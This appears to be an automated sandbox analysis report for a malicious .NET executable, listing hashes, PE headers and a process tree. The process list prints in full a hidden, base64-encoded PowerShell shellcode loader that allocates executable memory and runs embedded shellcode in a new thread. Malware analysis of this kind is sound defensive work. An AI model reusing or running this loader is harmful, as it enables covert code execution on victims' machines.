File name: | test2.exe |
Full analysis: | https://app.any.run/tasks/81581640-7f2b-4bd6-a0b9-567ab21903a0 |
Verdict: | Malicious activity |
Analysis date: | April 14, 2019, 19:22:04 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | 6A92E1520791F538BD68350CA9C64A76 |
SHA1: | 3CCFF9937BFA297B1534A6B34B397CEE8FE1DBF4 |
SHA256: | 5CB6C987F9E8C9862B94F266BBF4B39D1C281B682B670B2B7A521795B351BF46 |
SSDEEP: | 384:BwAXXwpskBwiRYj8ccCi6ah7YgPwWSwmcFJB71y:BXXXKHBxRYj8cEYgPwW2cFJB71y |
.exe | | | Generic CIL Executable (.NET, Mono, etc.) (82.9) |
---|---|---|
.dll | | | Win32 Dynamic Link Library (generic) (7.4) |
.exe | | | Win32 Executable (generic) (5.1) |
.exe | | | Generic Win/DOS Executable (2.2) |
.exe | | | DOS Executable Generic (2.2) |
ProductVersion: | |
---|---|
ProductName: | |
OriginalFileName: | test2.exe |
LegalTrademarks: | |
LegalCopyright: | |
InternalName: | test2 |
FileVersion: | 0.0.0.0 |
FileDescription: | |
CompanyName: | |
Comments: | |
CharacterSet: | Unicode |
LanguageCode: | Invariant |
FileSubtype: | - |
ObjectFileType: | Dynamic link library |
FileOS: | Win32 |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 0.0.0.0 |
FileVersionNumber: | 0.0.0.0 |
Subsystem: | Windows command line |
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x59ae |
UninitializedDataSize: | - |
InitializedDataSize: | 1536 |
CodeSize: | 14848 |
LinkerVersion: | 8 |
PEType: | PE32 |
TimeStamp: | 0000:00:00 00:00:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_CUI |
Compilation Date: | 01-Jan-1970 00:00:00 |
Comments: | - |
CompanyName: | - |
FileDescription: | - |
FileVersion: | 0.0.0.0 |
InternalName: | test2 |
LegalCopyright: | - |
LegalTrademarks: | - |
OriginalFilename: | test2.exe |
ProductName: | - |
ProductVersion: | - |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 3 |
Time date stamp: | 01-Jan-1970 00:00:00 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00002000 | 0x000039B4 | 0x00003A00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 3.08882 |
.rsrc | 0x00006000 | 0x000002D8 | 0x00000400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 2.3252 |
.reloc | 0x00008000 | 0x0000000C | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.0815394 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 3.19604 | 640 | UNKNOWN | UNKNOWN | RT_VERSION |
mscoree.dll |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2664 | "C:\Users\admin\AppData\Local\Temp\test2.exe" | C:\Users\admin\AppData\Local\Temp\test2.exe | — | explorer.exe |
User: admin Company: Integrity Level: MEDIUM Description: Version: 0.0.0.0 | ||||
2236 | C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JABhAHMAbgAgAD0AIAAnACQAQgBaAG8AIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAQgBaAG8AIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABhACwAMAB4AGMAMgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgBlACwAMAB4ADAAMQAsADAAeAA5ADMALAAwAHgANgAzACwAMAB4ADcAMAAsADAAeAA1AGEALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA3ADIALAAwAHgAMQBhACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgAMQBhACwAMAB4ADgAMwAsADAAeABjADIALAAwAHgAMAA0ACwAMAB4AGUAMgAsADAAeABmADQALAAwAHgANgBmACwAMAB4ADgAYgAsADAAeABmADIALAAwAHgAZgA2ACwAMAB4ADgAZgAsADAAeAA0AGMALAAwAHgAOQAzACwAMAB4ADcAZgAsADAAeAA2AGEALAAwAHgANwBkACwAMAB4ADkAMwAsADAAeAAxAGIALAAwAHgAZgBlACwAMAB4ADIAZQAsADAAeAAyADMALAAwAHgANgA4ACwAMAB4ADUAMgAsADAAeABjADMALAAwAHgAYwA4ACwAMAB4ADMAYwAsADAAeAA0ADcALAAwAHgANQAwACwAMAB4AGIAYwAsADAAeABlADgALAAwAHgANgA4ACwAMAB4AGQAMQAsADAAeAAwAGIALAAwAHgAYwBlACwAMAB4ADQANwAsADAAeABlADIALAAwAHgAMgAwACwAMAB4ADMAMgAsADAAeABjADkALAAwAHgANgAwACwAMAB4ADMAYgAsADAAeAA2ADYALAAwAHgAMgA5ACwAMAB4ADUAOAAsADAAeABmADQALAAwAHgANwBiACwAMAB4ADIAOAAsADAAeAA5AGQALAAwAHgAZQA5ACwAMAB4ADcAMQAsADAAeAA3ADgALAAwAHgANwA2ACwAMAB4ADYANQAsADAAeAAyADcALAAwAHgANgBkACwAMAB4AGYAMwAsADAAeAAzADMALAAwAHgAZgBiACwAMAB4ADAANgAsADAAeAA0AGYALAAwAHgAZAA1ACwAMAB4ADcAYgAsADAAeABmAGEALAAwAHgAMQA4ACwAMAB4AGQANAAsADAAeABhAGEALAAwAHgAYQBkACwAMAB4ADEAMwAsADAAeAA4AGYALAAwAHgANgBjACwAMAB4ADQAZgAsADAAeABmADcALAAwAHgAYgBiACwAMAB4ADIANQAsADAAeAA1ADcALAAwAHgAMQA0ACwAMAB4ADgAMQAsADAAeABmAGMALAAwAHgAZQBjACwAMAB4AGUAZQAsADAAeAA3AGQALAAwAHgAZgBmACwAMAB4ADIANAAsADAAeAAzAGYALAAwAHgANwBkACwAMAB4ADUAMwAsADAAeAAwADkALAAwAHgAOABmACwAMAB4ADgAYwAsADAAeABhAGEALAAwAHgANABkACwAMAB4ADIAOAAsADAAeAA2AGYALAAwAHgAZAA5ACwAMAB4AGEANwAsADAAeAA0AGEALAAwAHgAMQAyACwAMAB4AGQAOQAsADAAeAA3ADMALAAwAHgAMwAwACwAMAB4AGMAOAAsADAAeAA2AGMALAAwAHgANgAwACwAMAB4ADkAMgAsADAAeAA5AGIALAAwAHgAZAA2ACwAMAB4ADQAYwAsADAAeAAyADIALAAwAHgANABmACwAMAB4ADgAMAAsADAAeAAwADcALAAwAHgAMgA4ACwAMAB4ADIANAAsADAAeABjADcALAAwAHgANAAwACwAMAB4ADIAZAAsADAAeABiAGIALAAwAHgAMAA0ACwAMAB4AGYAYgAsADAAeAA0ADkALAAwAHgAMwAwACwAMAB4AGEAYgAsADAAeAAyAGMALAAwAHgAZAA4ACwAMAB4ADAAMgAsADAAeAA4AGYALAAwAHgAZQA4ACwAMAB4ADgAMAAsADAAeABkADEALAAwAHgAYQBlACwAMAB4AGEAOQAsADAAeAA2AGMALAAwAHgAYgA3ACwAMAB4AGMAZgAsADAAeABhAGEALAAwAHgAYwBlACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgAYQAwACwAMAB4AGUAMwAsADAAeAA3AGQALAAwAHgAMAA0ACwAMAB4AGUAYgAsADAAeAA2AGIALAAwAHgAYgAxACwAMAB4ADIANAAsADAAeAAxADQALAAwAHgANgBjACwAMAB4AGQAZAAsADAAeAAzAGYALAAwAHgANgA3ACwAMAB4ADUAZQAsADAAeAA0ADIALAAwAHgAZQBiACwAMAB4AGUAZgAsADAAeABkADIALAAwAHgAMABiACwAMAB4ADMANQAsADAAeABmADcALAAwAHgANgAzACwAMAB4ADEAYgAsADAAeABjADYALAAwAHgAMgA3ACwAMAB4AGMAYgAsADAAeAA0AGMALAAwAHgAMwA5ACwAMAB4AGMAOAAsADAAeAAyAGMALAAwAHgANAA0ACwAMAB4AGYAZAAsADAAeAA5AGMALAAwAHgANwBjACwAMAB4AGYAZQAsADAAeABkADQALAAwAHgAOQBjACwAMAB4ADEANgAsADAAeABmAGUALAAwAHgAZAA5ACwAMAB4ADQAOAAsADAAeAA4ADIALAAwAHgAZgA0ACwAMAB4ADQAZAAsADAAeABiADMALAAwAHgAZgBiACwAMAB4ADAAOQAsADAAeABjAGUALAAwAHgANQBiACwAMAB4AGYAZQAsADAAeAAwADkALAAwAHgAZAA3ACwAMAB4ADUANQAsADAAeAA3ADcALAAwAHgAZQBmACwAMAB4ADgANwAsADAAeAAzADkALAAwAHgAZAA4ACwAMAB4AGEAMAAsADAAeAA2ADcALAAwAHgAZQBhACwAMAB4ADkAOAAsADAAeAAxADAALAAwAHgAMABmACwAMAB4AGUAMAAsADAAeAAxADYALAAwAHgANABlACwAMAB4ADIAZgAsADAAeAAwAGIALAAwAHgAZgBkACwAMAB4AGUANwAsADAAeABjADUALAAwAHgAZQA0ACwAMAB4AGEAOAAsADAAeAA1ADAALAAwAHgANwAxACwAMAB4ADkAYwAsADAAeABmADAALAAwAHgAMgBiACwAMAB4AGUAMAAsADAAeAA2ADEALAAwAHgAMgBmACwAMAB4ADUANgAsADAAeAAyADIALAAwAHgAZQA5ACwAMAB4AGQAYwAsADAAeABhADYALAAwAHgAZQBjACwAMAB4ADEAYQAsADAAeABhADgALAAwAHgAYgA0ACwAMAB4ADkAOAAsADAAeABlAGEALAAwAHgAZQA3ACwAMAB4AGUANwAsADAAeAAwAGUALAAwAHgAZgA0ACwAMAB4AGQAZAAsADAAeAA4ADIALAAwAHgAYQBlACwAMAB4ADYAMAAsADAAeABkAGEALAAwAHgAMAA0ACwAMAB4AGYAOQAsADAAeAAxAGMALAAwAHgAZQAwACwAMAB4ADcAMQAsADAAeABjAGQALAAwAHgAOAAyACwAMAB4ADEAYgAsADAAeAA1ADQALAAwAHgANAA2ACwAMAB4ADAAYQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4ADMAMAAsADAAeAA3ADMALAAwAHgANQBlACwAMAB4ADkAOAAsADAAeABjADAALAAwAHgAMgA1ACwAMAB4ADMANAAsADAAeAA5ADgALAAwAHgAYQA4ACwAMAB4ADkAMQAsADAAeAA2AGMALAAwAHgAYwBiACwAMAB4AGMAZAAsADAAeABkAGQALAAwAHgAYgA4ACwAMAB4ADcAZgAsADAAeAA1AGUALAAwAHgANAA4ACwAMAB4ADQAMwAsADAAeABkADYALAAwAHgAMwAzACwAMAB4AGQAYgAsADAAeAAyAGIALAAwAHgAZAA0ACwAMAB4ADYAYQAsADAAeAAyAGIALAAwAHgAZgA0ACwAMAB4ADIANwAsADAAeAA1ADkALAAwAHgAYQBkACwAMAB4AGMAOAAsADAAeABmADEALAAwAHgAYQA3ACwAMAB4AGQAYgAsADAAeAAyADAALAAwAHgAYwAyADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABKAFgAQQBIAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAFgAQQBIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABKAFgAQQBIACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBzAG4AKQApADsAJABlAFUARgAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGgASABsACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGgASABsACAAJABlAFUARgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABlAFUARgAgACQAZQAiADsAfQA= | C:\Windows\system32\cmd.exe | — | test2.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2320 | powershell -window hidden -EncodedCommand JABhAHMAbgAgAD0AIAAnACQAQgBaAG8AIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAQgBaAG8AIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABhACwAMAB4AGMAMgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgAYgBlACwAMAB4ADAAMQAsADAAeAA5ADMALAAwAHgANgAzACwAMAB4ADcAMAAsADAAeAA1AGEALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA3ADIALAAwAHgAMQBhACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgAMQBhACwAMAB4ADgAMwAsADAAeABjADIALAAwAHgAMAA0ACwAMAB4AGUAMgAsADAAeABmADQALAAwAHgANgBmACwAMAB4ADgAYgAsADAAeABmADIALAAwAHgAZgA2ACwAMAB4ADgAZgAsADAAeAA0AGMALAAwAHgAOQAzACwAMAB4ADcAZgAsADAAeAA2AGEALAAwAHgANwBkACwAMAB4ADkAMwAsADAAeAAxAGIALAAwAHgAZgBlACwAMAB4ADIAZQAsADAAeAAyADMALAAwAHgANgA4ACwAMAB4ADUAMgAsADAAeABjADMALAAwAHgAYwA4ACwAMAB4ADMAYwAsADAAeAA0ADcALAAwAHgANQAwACwAMAB4AGIAYwAsADAAeABlADgALAAwAHgANgA4ACwAMAB4AGQAMQAsADAAeAAwAGIALAAwAHgAYwBlACwAMAB4ADQANwAsADAAeABlADIALAAwAHgAMgAwACwAMAB4ADMAMgAsADAAeABjADkALAAwAHgANgAwACwAMAB4ADMAYgAsADAAeAA2ADYALAAwAHgAMgA5ACwAMAB4ADUAOAAsADAAeABmADQALAAwAHgANwBiACwAMAB4ADIAOAAsADAAeAA5AGQALAAwAHgAZQA5ACwAMAB4ADcAMQAsADAAeAA3ADgALAAwAHgANwA2ACwAMAB4ADYANQAsADAAeAAyADcALAAwAHgANgBkACwAMAB4AGYAMwAsADAAeAAzADMALAAwAHgAZgBiACwAMAB4ADAANgAsADAAeAA0AGYALAAwAHgAZAA1ACwAMAB4ADcAYgAsADAAeABmAGEALAAwAHgAMQA4ACwAMAB4AGQANAAsADAAeABhAGEALAAwAHgAYQBkACwAMAB4ADEAMwAsADAAeAA4AGYALAAwAHgANgBjACwAMAB4ADQAZgAsADAAeABmADcALAAwAHgAYgBiACwAMAB4ADIANQAsADAAeAA1ADcALAAwAHgAMQA0ACwAMAB4ADgAMQAsADAAeABmAGMALAAwAHgAZQBjACwAMAB4AGUAZQAsADAAeAA3AGQALAAwAHgAZgBmACwAMAB4ADIANAAsADAAeAAzAGYALAAwAHgANwBkACwAMAB4ADUAMwAsADAAeAAwADkALAAwAHgAOABmACwAMAB4ADgAYwAsADAAeABhAGEALAAwAHgANABkACwAMAB4ADIAOAAsADAAeAA2AGYALAAwAHgAZAA5ACwAMAB4AGEANwAsADAAeAA0AGEALAAwAHgAMQAyACwAMAB4AGQAOQAsADAAeAA3ADMALAAwAHgAMwAwACwAMAB4AGMAOAAsADAAeAA2AGMALAAwAHgANgAwACwAMAB4ADkAMgAsADAAeAA5AGIALAAwAHgAZAA2ACwAMAB4ADQAYwAsADAAeAAyADIALAAwAHgANABmACwAMAB4ADgAMAAsADAAeAAwADcALAAwAHgAMgA4ACwAMAB4ADIANAAsADAAeABjADcALAAwAHgANAAwACwAMAB4ADIAZAAsADAAeABiAGIALAAwAHgAMAA0ACwAMAB4AGYAYgAsADAAeAA0ADkALAAwAHgAMwAwACwAMAB4AGEAYgAsADAAeAAyAGMALAAwAHgAZAA4ACwAMAB4ADAAMgAsADAAeAA4AGYALAAwAHgAZQA4ACwAMAB4ADgAMAAsADAAeABkADEALAAwAHgAYQBlACwAMAB4AGEAOQAsADAAeAA2AGMALAAwAHgAYgA3ACwAMAB4AGMAZgAsADAAeABhAGEALAAwAHgAYwBlACwAMAB4ADYAOAAsADAAeAA3ADUALAAwAHgAYQAwACwAMAB4AGUAMwAsADAAeAA3AGQALAAwAHgAMAA0ACwAMAB4AGUAYgAsADAAeAA2AGIALAAwAHgAYgAxACwAMAB4ADIANAAsADAAeAAxADQALAAwAHgANgBjACwAMAB4AGQAZAAsADAAeAAzAGYALAAwAHgANgA3ACwAMAB4ADUAZQAsADAAeAA0ADIALAAwAHgAZQBiACwAMAB4AGUAZgAsADAAeABkADIALAAwAHgAMABiACwAMAB4ADMANQAsADAAeABmADcALAAwAHgANgAzACwAMAB4ADEAYgAsADAAeABjADYALAAwAHgAMgA3ACwAMAB4AGMAYgAsADAAeAA0AGMALAAwAHgAMwA5ACwAMAB4AGMAOAAsADAAeAAyAGMALAAwAHgANAA0ACwAMAB4AGYAZAAsADAAeAA5AGMALAAwAHgANwBjACwAMAB4AGYAZQAsADAAeABkADQALAAwAHgAOQBjACwAMAB4ADEANgAsADAAeABmAGUALAAwAHgAZAA5ACwAMAB4ADQAOAAsADAAeAA4ADIALAAwAHgAZgA0ACwAMAB4ADQAZAAsADAAeABiADMALAAwAHgAZgBiACwAMAB4ADAAOQAsADAAeABjAGUALAAwAHgANQBiACwAMAB4AGYAZQAsADAAeAAwADkALAAwAHgAZAA3ACwAMAB4ADUANQAsADAAeAA3ADcALAAwAHgAZQBmACwAMAB4ADgANwAsADAAeAAzADkALAAwAHgAZAA4ACwAMAB4AGEAMAAsADAAeAA2ADcALAAwAHgAZQBhACwAMAB4ADkAOAAsADAAeAAxADAALAAwAHgAMABmACwAMAB4AGUAMAAsADAAeAAxADYALAAwAHgANABlACwAMAB4ADIAZgAsADAAeAAwAGIALAAwAHgAZgBkACwAMAB4AGUANwAsADAAeABjADUALAAwAHgAZQA0ACwAMAB4AGEAOAAsADAAeAA1ADAALAAwAHgANwAxACwAMAB4ADkAYwAsADAAeABmADAALAAwAHgAMgBiACwAMAB4AGUAMAAsADAAeAA2ADEALAAwAHgAMgBmACwAMAB4ADUANgAsADAAeAAyADIALAAwAHgAZQA5ACwAMAB4AGQAYwAsADAAeABhADYALAAwAHgAZQBjACwAMAB4ADEAYQAsADAAeABhADgALAAwAHgAYgA0ACwAMAB4ADkAOAAsADAAeABlAGEALAAwAHgAZQA3ACwAMAB4AGUANwAsADAAeAAwAGUALAAwAHgAZgA0ACwAMAB4AGQAZAAsADAAeAA4ADIALAAwAHgAYQBlACwAMAB4ADYAMAAsADAAeABkAGEALAAwAHgAMAA0ACwAMAB4AGYAOQAsADAAeAAxAGMALAAwAHgAZQAwACwAMAB4ADcAMQAsADAAeABjAGQALAAwAHgAOAAyACwAMAB4ADEAYgAsADAAeAA1ADQALAAwAHgANAA2ACwAMAB4ADAAYQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4ADMAMAAsADAAeAA3ADMALAAwAHgANQBlACwAMAB4ADkAOAAsADAAeABjADAALAAwAHgAMgA1ACwAMAB4ADMANAAsADAAeAA5ADgALAAwAHgAYQA4ACwAMAB4ADkAMQAsADAAeAA2AGMALAAwAHgAYwBiACwAMAB4AGMAZAAsADAAeABkAGQALAAwAHgAYgA4ACwAMAB4ADcAZgAsADAAeAA1AGUALAAwAHgANAA4ACwAMAB4ADQAMwAsADAAeABkADYALAAwAHgAMwAzACwAMAB4AGQAYgAsADAAeAAyAGIALAAwAHgAZAA0ACwAMAB4ADYAYQAsADAAeAAyAGIALAAwAHgAZgA0ACwAMAB4ADIANwAsADAAeAA1ADkALAAwAHgAYQBkACwAMAB4AGMAOAAsADAAeABmADEALAAwAHgAYQA3ACwAMAB4AGQAYgAsADAAeAAyADAALAAwAHgAYwAyADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABKAFgAQQBIAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAFgAQQBIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABKAFgAQQBIACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBzAG4AKQApADsAJABlAFUARgAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGgASABsACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGgASABsACAAJABlAFUARgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABlAFUARgAgACQAZQA